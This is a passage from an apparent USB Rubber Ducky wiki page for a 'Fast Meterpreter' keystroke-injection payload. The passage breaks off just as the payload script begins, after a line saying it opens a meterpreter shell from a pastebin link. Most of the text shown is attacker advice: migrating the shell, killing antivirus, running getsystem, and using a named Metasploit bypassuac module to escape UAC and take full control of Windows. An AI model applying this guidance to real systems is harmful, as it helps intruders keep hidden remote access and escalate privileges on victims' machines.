torbenkrah/USB-Rubber-duckey-wiki/Payload--Fast-Meterpreter.md

 * NOTE: It is recommended you migrate the shell and kill antivirus as soon as possible, as most antiviruses will pick up on a meterpreter shell and kill it.
 Running ```getsystem``` command on meterpreter is also great.
 Use the windows/local/bypassuac modules (find them with the command ```search bypassuac```, I find that ```exploit/windows/local/bypassuac_injection_winsxs``` works very well for my Windows 10 device, disabled antivirus of course!) for Windows 8 and up.
 This will allow you to bypass the UAC on windows, any level, and be able to freely run the ```getsystem``` command, which essentially lets you do anything.

+* EDIT (28/09/2021): Using ```-UseBasicParsing``` you can fix a fatal error who happens when the target has not the Internet Explorer parser installed but you have to decode the response because is a ByteArray.

 ```
 REM Opens a meterpreter using a pastebin link
 REM See https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/remote_access/SingleSecondShell/readme.md